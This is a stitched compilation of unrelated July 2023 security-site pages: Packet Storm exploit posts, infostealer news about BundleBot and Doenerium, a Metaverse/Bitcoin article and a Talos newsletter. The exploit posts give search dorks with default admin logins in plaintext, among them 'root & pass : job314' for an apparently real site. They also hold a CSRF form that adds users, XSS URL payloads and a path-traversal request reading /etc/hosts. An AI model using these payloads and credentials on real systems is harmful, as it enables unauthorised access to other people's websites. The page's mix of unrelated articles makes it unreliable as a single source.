Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | ef0029a51004a0f4fd1207577f144340dffe6a0657f6ace9160fd98579a7d596

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings

CMS Contabil Bandeirantes version 1.0.0 suffers from a cross site request forgery vulnerability.

======================================================================================================================================  
| # Title     : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                            |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              |  
| # Vendor    : https://scriptmafia.org/                                                                                             |    
======================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] Go to the line 12.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/addUser.php 

[+] Save code as poc.html 

<section id="main" class="column" style="height: 680px;">

        <h4 class="alert_info">Necessário preencher todos os campos.</h4>  
        

        <article class="module width_full">  
      <form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">  
        <header><h3>Adicionar Usuários</h3></header>

                      <div class="module_content">  
                <fieldset>  
                  <label>Nome</label>  
                  <input name="nome" id="nome" value="" type="text">  
                </fieldset>  
                <fieldset>  
                  <label>Email</label>  
                  <input name="email" id="email" value="" type="text">  
                </fieldset>  
                <fieldset>  
                  <label>Senha</label>  
                  <input name="senha" id="senha" value="" type="text">  
                </fieldset>  
                <div class="clear"></div>  
            </div>    
        <footer>  
          <div class="submit_link">  
            <input id="limpar" name="limpar" value="limpar" type="submit">  
            <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">  
          </div>  
        </footer>  
      </form>    
    </article>

                    <div class="spacer"></div>  
  </section>

  Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

CMS Contabil Bandeirantes 1.0.0 Cross Site Request Forgery

A new malware strain known as BundleBot has been stealthily operating under the radar by taking advantage of .NET single-file deployment techniques, enabling threat actors to capture sensitive information from compromised hosts.
"BundleBot is abusing the dotnet bundle (single-file), self-contained format that results in very low or no static detection at all," Check Point said in a report

A new malware strain known as **BundleBot** has been stealthily operating under the radar by taking advantage of .NET single-file deployment techniques, enabling threat actors to capture sensitive information from compromised hosts.

"BundleBot is abusing the dotnet bundle (single-file), self-contained format that results in very low or no static detection at all," Check Point said in a report published this week, adding it is "commonly distributed via Facebook Ads and compromised accounts leading to websites masquerading as regular program utilities, AI tools, and games."

Some of these websites aim to mimic Google Bard, the company's conversational generative artificial intelligence chatbot, enticing victims into downloading a bogus RAR archive ("Google\_AI.rar") hosted on legitimate cloud storage services such as Dropbox.

The archive file, when unpacked, contains an executable file ("GoogleAI.exe"), which is the .NET single-file, self-contained application ("GoogleAI.exe") that, in turn, incorporates a DLL file ("GoogleAI.dll"), whose responsibility is to fetch a password-protected ZIP archive from Google Drive.

The extracted content of the ZIP file ("ADSNEW-1.0.0.3.zip") is another .NET single-file, self-contained application ("RiotClientServices.exe") that incorporates the BundleBot payload ("RiotClientServices.dll") and a command-and-control (C2) packet data serializer ("LirarySharing.dll").

"The assembly RiotClientServices.dll is a custom, new stealer/bot that uses the library LirarySharing.dll to process and serialize the packet data that are being sent to C2 as a part of the bot communication," the Israeli cybersecurity company said.

The binary artifacts employ custom-made obfuscation and junk code in a bid to resist analysis, and come with capabilities to siphon data from web browsers, capture screenshots, grab Discord tokens, information from Telegram, and Facebook account details.

Check Point said it also detected a second BundleBot sample that's virtually identical in all aspects barring the use of HTTPS to exfiltrate the information to a remote server in the form of a ZIP archive.

"The delivering method via Facebook Ads and compromised accounts is something that has been abused by threat actors for a while, still combining it with one of the capabilities of the revealed malware (to steal a victim's Facebook account information) could serve as a tricky self-feeding routine," the company noted.

The development comes as Malwarebytes uncovered a new campaign that employs sponsored posts and compromised verified accounts that impersonate Facebook Ads Manager to entice users into downloading rogue Google Chrome extensions that are designed to steal Facebook login information.

Users who click on the embedded link are prompted to download a RAR archive file containing an MSI installer file that, for its part, launches a batch script to spawn a new Google Chrome window with the malicious extension loaded using the "--load-extension" flag -

> _start chrome.exe --load-extension="%~dp0/nmmhkkegccagdldgiimedpiccmgmiedagg4" "https://www.facebook.com/business/tools/ads-manager"_

UPCOMING WEBINAR

Shield Against Insider Threats: Master SaaS Security Posture Management

Worried about insider threats? We've got you covered! Join this webinar to explore practical strategies and the secrets of proactive security with SaaS Security Posture Management.

Join Today

"That custom extension is cleverly disguised as Google Translate and is considered 'Unpacked' because it was loaded from the local computer, rather than the Chrome Web Store," Jérôme Segura, director of threat intelligence at Malwarebytes, explained, noting it is "entirely focused on Facebook and grabbing important pieces of information that could allow an attacker to log into accounts."

The captured data is subsequently sent using the Google Analytics API to get around content security policies (CSPs) to mitigate cross-site scripting (XSS) and data injection attacks.

The threat actors behind the activity are suspected to be of Vietnamese origin, who have, in recent months, exhibited acute interest in targeting Facebook business and advertising accounts. Over 800 victims worldwide have been impacted, with 310 of those located in the U.S.

"Fraudsters have a lot of time on their hands and spend years studying and understanding how to abuse social media and cloud platforms, where it is a constant arm's race to keep bad actors out," Segura said. "Remember that there is no silver bullet and anything that sounds too good to be true may very well be a scam in disguise."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Sophisticated BundleBot Malware Disguised as Google AI Chatbot and Utilities

By Owais Sultan
The Metaverse refers to a virtual space or a collective virtual shared space, created by the convergence of…
This is a post from HackRead.com Read the original post: The Metaverse is connected to cryptocurrencies – but not so much to Bitcoin

The Metaverse refers to a virtual space or a collective virtual shared space, created by the convergence of various virtual reality (VR), augmented reality (AR), and blockchain technologies. It’s envisioned as an immersive, interconnected digital world where users can interact with each other and digital assets in real time.

The **Metaverse** is the next big thing in the blockchain and tech innovations sectors. Individual and institutional investors are venturing into exploring its benefits. Microsoft, Google, and Meta are only some of the most well-known brands trying to immerse into the Metaverse. News headlines are talking about the ways in which the Metaverse changes the digital and real worlds daily, and many of them are approaching the connection between cryptocurrencies and the Metaverse. 

A world where people engage with the Metaverse is going to be extremely digitized and could spring another tech revolution. So many cannot help but wonder if there is a vital connection between digital currencies and the Metaverse. Should they head to exchange platforms like **Binance** and explore the various ways in which they can buy Bitcoin and other cryptocurrencies? This article has you covered when it comes to the relationship between the Metaverse and cryptocurrencies, and especially the connection or lack of it to Bitcoin. 

**What should you know about the connection between the Metaverse and digital currencies?**

The relationship between the Metaverse and digital currencies is based on the idea that users should be able to monetize their digital assets. Suppose they play a game in the Metaverse; they should be able to monetize their in-game assets, avatars, and even tools. The monetization is possible through the use of digital currencies or non-fungible tokens. 

Metaverse users can buy cryptocurrencies through exchange platforms or earn them. However, buying is the easiest option because they can transfer real money into their digital wallets and use the funds to engage in virtual activities. 

Some crypto specialists state that the **Metaverse needs cryptocurrencies** to survive, but at the moment, this is mandatory. However, if the sectors evolve, things might change, and both commodity classes might increase in value. 

We talked about the connection between the Metaverse and cryptocurrencies, but let’s dive deeper into what the concept implies. People use the term Metaverse to refer to the virtual universes created **with the help of blockchain**. The Metaverse is a virtual reality developed with the help of the internet and populated by avatars that represent the users. The avatars allow them to interact with each other and with digital assets. 

Because the Metaverse is built on blockchain technology, it’s totally transparent and secure. Hope is that the Metaverse will be able to integrate the real world in the future. To provide people with the level of immersion it promises, it should be more than a virtual world; it should become a new way of life. 

**Now, why did we say that there isn’t really a connection between the Metaverse and Bitcoin?**

Isn’t Bitcoin the largest cryptocurrency by market cap? Shouldn’t it be one of the main digital currencies used to take advantage of the Metaverse? 

Bitcoin has become a store of value over the years, and it competes with commodities like gold for this status. But the truth is that beyond being a store of value and digital currency, it lacks other use cases and therefore doesn’t have the necessary qualifications to join the Metaverse. 

Let’s review the reasons why Bitcoin finds it difficult to join the Metaverse. 

**Bitcoin is based on an algorithm that consumes more energy than many countries**

Research shows that the average Bitcoin transaction **uses 2,264-kilowatt hours (kWh)** worth of electricity because it’s built on the proof-of-work consensus, which is known for consuming high amounts of power. The algorithm requires tremendous computing power to verify a block and add it to the chain. 

To help you understand why Bitcoin is labelled as a major power consumer, we’ll tell you that the average American household needs around 893 kWh monthly to function correctly. 

And the more the network grows, the higher its energy consumption goes. 

**Bitcoin is the oldest but less useful digital currency**

We mentioned earlier that Bitcoin was created as an alternative currency that was supposed to replace intermediaries in online transactions. And it serves its purpose flawlessly, but it stops there. The ecosystem has been waiting to receive updates recently to keep up with the sector’s needs. Other blockchains are more practical, efficient, and faster. Ethereum, the second largest cryptocurrency by market cap, is one of the leading cryptocurrencies for Metaverse transactions due to its several utility cases (**NFTs, DeFi, smart contracts**). 

**Regulators don’t really like Bitcoin**

Regulators get a headache whenever they think about Bitcoin because it’s quite difficult to tax it. Specialists believe that after Bitcoin was made an **official currency in El Salvador**, private enterprises and even the government could face some legal liability. And the tech giants supporting the Metaverse don’t want to expose themselves to such a burden. 

**Bitcoin’s volatility could deter users from trading in the Metaverse**

Many institutional investors refuse to accept Bitcoin because it’s one of the most volatile assets on the market. Its price fluctuates wildly, and they fear accepting it as a payment method because it could lose its value quickly. And it seems that the Metaverse also dislikes wild volatility because it makes it difficult to manage transactions. The Metaverse users prefer stablecoins because they are pegged to other assets and tend to maintain their value. 

**Bitcoin isn’t among the top cryptocurrencies used in the Metaverse.**

Metaverse users have already established the top cryptocurrencies they prefer for trading in the virtual world. Most are energy efficient, more stable, and imply lower transaction costs. Ethereum, Solana, and Cardano are only some of the several cryptocurrencies used for funding activities in the Metaverse. 

And while things might change at any moment, many wonder if Bitcoin will be able to keep up with the trend. 

**Final worlds**

Let’s not forget that Bitcoin is the oldest cryptocurrency in the sector, which has survived several bear markets and performed better than many other digital assets. It could receive an upgrade at any time to become more energy efficient and become a viable solution for Metaverse trading. And even if it’s not the cryptocurrency of choice for Metaverse users, they can always sell Bitcoins and buy the NFTs that enable them to immerse into the new virtual world. 

**RELATED ARTICLES**

1.  How To Use ChatGPT To Trade Cryptocurrency
2.  What is Blockchain Gaming and its Play-to-Earn Model?
3.  5 Ways Smart Contracts Are Making A Real-World Difference
4.  Shiba Inu: The Meme Coin Fueling an Open-Source Ecosystem
5.  Metaverse as New Game Reality: To Invest in VR Development or Not?

The Metaverse is connected to cryptocurrencies – but not so much to Bitcoin

By Habiba Rashid
Some of the pages have millions of likes on them, suggesting that this is a large-scale scam.
This is a post from HackRead.com Read the original post: Fake ChatGPT and AI pages on Facebook are spreading infostealers

**AI services like ChatGPT, Google BARD, and Jasper are being abused to spread malware like BundleBot and Doenerium through Facebook.**

In a recent discovery by cybersecurity firm Check Point Research (CPR), cybercriminals have been found **using Facebook** as a platform to deceive unsuspecting users into downloading malicious malware, ultimately leading to the theft of private information and passwords.

In this attack trend, scammers are taking advantage of the increasing interest in generative artificial intelligence-based (AI) applications, such as Google Bard and OpenAI’s ChatGPT, to lure users into their traps.

The latest discovery by CPR should not come as a surprise, as Facebook has a track record of being abused by cybercriminals. Its features have been abused over the years to spread malware, **or worse, even ransomware**.

Just a couple of days ago, Malwarebytes **confirmed** that a Vietnamese threat actor was stealing malware through META Business Accounts. The scam is also utilizing malicious Chrome browser extensions to successfully exfiltrate Facebook login credentials.

**The Scam Operation:**

The modus operandi of these cybercriminals involves creating fake Facebook pages or groups, posing as popular AI brands, and generating engaging content to attract users’ attention.

Once users interact with the content by liking or commenting, it appears on their friends’ feeds, further spreading the scam. The fraudulent pages then offer a new service or exclusive content via a link, which leads users to unknowingly download malicious malware designed to steal their online passwords, cryptocurrency wallets, and other sensitive information stored in their browsers.

Examples of targeted AI brands include **Bard New, Bard Chat, GPT-5, G-Bard AI**, and the popular AI brand Jasper AI. These scammers meticulously replicate legitimate pages, using bots and Vietnamese chat language to give the appearance of authenticity and credibility.

**The Malicious Payload:**

The malware delivered by these fake Facebook pages is identified as “**Doenerium**,” an infostealer previously observed in various scams. This malware operates stealthily to gather various types of information, including browser data like cookies, bookmarks, and browsing history.

According to CPR’s **report**, the malware also steals cryptocurrency wallet information, FTP credentials, and sessions from social and gaming platforms. The stolen data is then consolidated into an archive and uploaded to file-sharing platforms.

**Sophisticated Scams and the Rise of BundleBot:**

While some scams rely on open-source toolsets and free services, others adopt more sophisticated techniques. Check Point Research recently uncovered advanced campaigns that employ Facebook ads and compromised accounts to distribute a stealthy stealer-bot called **BundleBot**.

This new malware operates under the radar, making it challenging to detect and shut down these campaigns. BundleBot specifically targets stealing Facebook account information, making the campaigns self-sustaining.

**The Rising Threat of Infostealers:**

The **rise in infostealer usage** can be linked to the growth of underground markets, where initial access brokers focus on obtaining and trading access or credentials to compromised systems. As the value of data increases for targeted attacks like business email compromise and spear-phishing, the proliferation of infostealers has grown.

**Protecting Against Scams:**

As public interest in **AI-based solutions** continues to rise, it’s crucial for individuals and organizations to stay vigilant against cybercriminal tactics. Users can identify phishing and impersonation attempts by verifying the sender’s email or web address, looking for domain misspellings, and downloading software only from trusted sources. 

**RELATED ARTICLES**

1.  Fake ChatGPT Extension Hijacks Facebook Accounts
2.  Alert: Scammers Pose as ChatGPT in New Phishing Scam
3.  WormGPT – The Malicious ChatGPT Alternative Goes Viral
4.  100,000 Hacked ChatGPT Accounts Discovered on Dark Web
5.  FortiGuard Labs Discovers .ZIP Domains Fueling Phishing Attacks

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Fake ChatGPT and AI pages on Facebook are spreading infostealers

Office Suite Premium v10.9.1.42602 was discovered to contain a local file inclusion (LFI) vulnerability via the component /etc/hosts.

    # Exploit Title: Office Suite Premium 10.9.1.42602 -  Local File Inclusion # Date: 06-26-2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.mobisystems.com/# Software Link: https://apps.apple.com/us/app/officesuite-docs-pdf-editor/id924005506# Version: Office Suite Premium 10.9.1.42602# Tested on: Ubuntu 18.04# POCGET /../../../../../../../../../../../../../../../etc/hosts HTTP/2Host: connect.mobisystems.comAccept: */*Clv: 42602Pushtkn: msc://CD3D8C6E-A727-4674-A1AB-B4455990B4A7:com.mobisystems.ios.office.freeAccept-Language: tr-TR,tr;q=0.9Accept-Encoding: gzip, deflateApp: com.mobisystems.ios.office.freeUser-Agent: OfficeSuiteFree2/42602 CFNetwork/1404.0.5 Darwin/22.3.0Gdpr: trueAccount: 234c89ff-7e80-4b64-9d35-8653fe131795Tkn: 3cb5e874-51a4-4526-96d5-82c6321fdd19Result : 127.0.0.1 localhost 169.254.169.254 metadata.google.internal metadata 169.254.169.253 appengine.googleapis.internal appengine Url: https://connect.mobisystems.com/etc/hosts

CVE-2023-37601: Office Suite Premium 10.9.1.42602 Local File Inclusion ≈ Packet Storm

Last week, the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S.’s critical infrastructure security (and more).

Thursday, July 20, 2023 14:07

Welcome to this week’s edition of the Threat Source newsletter.

Last week, the Biden administration released its formal roadmap for its national cybersecurity initiative meant to encourage greater investment in cybersecurity and strengthen the U.S.’s critical infrastructure security (and more).

The roadmap goes a long way toward actualizing a plan the administration released earlier this year and sets tangible goals and programs to put many of these initiatives into action. But because nothing ever moves quickly in government, this roadmap and the associated plan are already hitting a few roadblocks.

First, there’s the ever-present partisan politics. Republican state lawmakers are backing a legal challenge in the court systems to block an Environmental Protection Administration rule that asked local water systems to evaluate their current cybersecurity systems and protections while conducting sanitation surveys. To me, simply asking critical infrastructure to consider these factors as part of their normal processes seems like a non-issue, but the U.S. Appeals Court has put a hold on this rule for the time being (though it didn’t give a precise reason at the time of its ruling).

If lawmakers are going to hash these types of regulations in court every time something new pops up, we’ll never reach the point of these rules actually being implemented.

Two leading Republican members of the U.S. House came out hours after the Biden administration released the roadmap, saying they would use their respective House panels to, “exercise strict oversight on CISA’s efforts” to implement many of the policies outlined.

Regardless of which side of the political spectrum you fall, cybersecurity should be something our lawmakers can all agree on.

Say these arguments extend through the 2024 election — what happens if control of the White House or Congress switches between parties? And then that changes again in 2026? Change is slow, so none of these initiatives are going to be implemented overnight.

If our government can’t come to any sort of agreement about the importance of cybersecurity, and how to encourage stronger public-private partnerships to reach the country’s goals, this is just going to be another partisan issue that’s held up by legal challenges, budget negotiations, hearings and verbal discourse. And by the time that all subsides, the people in charge of outlining and implementing these cybersecurity goals could have very well changed.

So, forgive me if I’m coming off as a bit skeptical that anything in this roadmap will end up passing any mile markers.

**The one big thing**

Our researchers recently discovered a threat actor conducting several campaigns against government entities, military organizations and civilian users in Ukraine and Poland. Our recent reporting states that these operations are very likely aimed at stealing information and gaining persistent remote access. The activity we analyzed occurred as early as April 2022 and as recently as earlier this month, demonstrating the persistent nature of the threat actor. The final payloads include the AgentTesla remote access trojan (RAT), Cobalt Strike beacons and njRAT.

**Why do I care?**

If you’re a user in Ukraine or Poland, especially someone working in the government or military sectors, this is a clear-cut example of a spam campaign targeting this population. For those who fall outside of that demographic, it’s interesting that this group is still relying on the user enabling macros in Office, since Microsoft disabled those by default earlier this year. These are also highly targeted emails with (relatively speaking) convincing lures, so whoever is behind these is not to be ignored.

**So now what?**

There are multiple Cisco Secure protections in place to defend against the types of spam used in these campaigns. Other Snort rules and detection content can prevent the execution of the malware used as the final payload. Our researchers have also published examples of the types of lure images and documents used in the initial phishing emails so users can know what to be on the lookout for.

**Top security headlines of the week**

**Chinese state-sponsored actors reportedly accessed email accounts belonging to several U.S.-based organizations and federal government agencies,** including the State Department. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a detailed timeline on the campaign, stating that an investigation from Microsoft revealed that “advanced persistent threat (APT) actors accessed and exfiltrated unclassified Exchange Online Outlook data” after users reported suspicious activities in their Microsoft 365 cloud environment. While the full scope of the hack is still under investigation, reports indicate that the actors were primarily trying to steal sensitive information. While CISA or Microsoft have yet to disclose any specific vulnerabilities the actors exploited, the CISA report does say that the APT used a Microsoft account consumer key to forge tokens and impersonate targeted users. “Microsoft remediated the issue by first blocking tokens issued with the acquired key and then replacing the key to prevent continued misuse,” the report states. (CISA, CNN)

Popular tax preparation software companies are under fire from lawmakers for **allegedly sharing personal information with social media sites, including Google and Meta.** Several Democratic lawmakers released a report last week that accused TaxAct, H&R Block and TaxSlayer of embedding Meta and Google’s tracking pixels on their sites, potentially violating U.S. law and sharing taxpayers’ information with those companies. The report says the data was kept anonymous, but the companies could “easily” use the information to identify individuals or create targeted advertising for them. The report has also renewed calls for the Internal Revenue Service to offer its own, free online tax filing service for U.S. consumers. (Vox, USA Today)

**Apple had to roll back and then re-release a security update** that addressed an actively exploited vulnerability in WebKit. Apple initially released a Rapid Security Response patch for iPhones and iPads on July 11 to fix CVE-2023-37450, a remote code execution vulnerability in the WebKit browser engine that Safari and other web browsers use. However, users reported that the fix was causing Safari to not connect correctly to major websites like Facebook, Instagram and Zoom, leading Apple to pull back the patch. Since then, Apple released a new fix for iOS, iPadOS and macOS that reliably fixes the vulnerability again. Though few details are currently available about CVE-2023-37450, Apple indicated it had been exploited in the wild and could be triggered by a vulnerable browser processing specially crafted web content. (Forbes, Gizmodo)

**Can’t get enough Talos?**

*   Vulnerability Roundup: Memory corruption vulnerability in Microsoft Edge; MilesightVPN and router could be taken over
*   Malicious Microsoft Drivers Could Number in the Thousands: Cisco Talos
*   New Threat Actor Launches Cyber-attacks on Ukraine and Poland
*   Uncovering weaknesses in Apple macOS and VMWare vCenter: 12 vulnerabilities in RPC implementation
*   The Need to Know: Why are there so many malware-as-a-service offerings?
*   Implementing an ISO-compliant threat intelligence program
*   Talos Takes Ep. #147: The dangers of "Mercenary" groups and the spyware they create

**Upcoming events where you can find Talos**

**BlackHat (Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

_**“Most prevalent malware files” is taking a break this week for maintenance.**_

The federal government’s cybersecurity policies are falling into place just in time to be stalled again

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

Posted Jul 20, 2023

Authored by indoushka

CMS Nexin Adminisztracios Kozpont version 1.2 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | e614477d10fc119020f0bb6bfcef55d3cf59f2217502dd441fe065c9b47251c1

Download | Favorite | View

**CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS Nexin Adminisztrációs Központ v1.2 Insecure Settings Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : Nexin Adminisztrációs Központ v1.2                                                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://discocenterhu/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,857)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,229)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,590)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,754)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Nexin Adminisztracios Kozpont 1.2 Insecure Settings

CMS NaiveScripters version 3.0.1 suffers from a cross site scripting vulnerability.

    ====================================================================================================================================| # Title     : CMS NaiveScripters v3.0.1 XSS Vulnerability                                                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/                                                                                            |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] use payload : /events.php?id=<marquee><font color=lime size=32>Hacked by indoushka</font></marquee>[+] http://127.0.0.1/oceannstuedubd/events.php?id=%3Cmarquee%3E%3Cfont%20color=lime%20size=32%3EHacked%20by%20indoushka%3C/font%3E%3C/marquee%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

CMS NaiveScripters 3.0.1 Cross Site Scripting

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

**CMS iQ-Digital 2.0 Cross Site Scripting**

Posted Jul 20, 2023

Authored by indoushka

CMS iQ-Digital version 2.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 3320c1901d54ffd35aac7dcb03095b447934214a707ed6d7ebb3179839c2a7c6

Download | Favorite | View

**CMS iQ-Digital 2.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : CMS iQ-Digital v2.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://iq-medya.net.tr                                                                                            |  | # Dork      : intext:''Tasarım iQ Digital''                                                                                      |====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /tr/blog.php?page=<script>alert(/indoushka/);</script>[+]  http://127.0.0.1/uzmangayrimenkulcomtr/tr/blog.php?page=%3Cscript%3Ealert(/indoushka/);%3C/script%3EGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,726)
*   Arbitrary (16,152)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,333)
*   DoS (23,360)
*   Encryption (2,365)
*   Exploit (51,612)
*   File Inclusion (4,208)
*   File Upload (965)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,032)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,661)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,661)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,303)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,709)
*   Web (9,621)
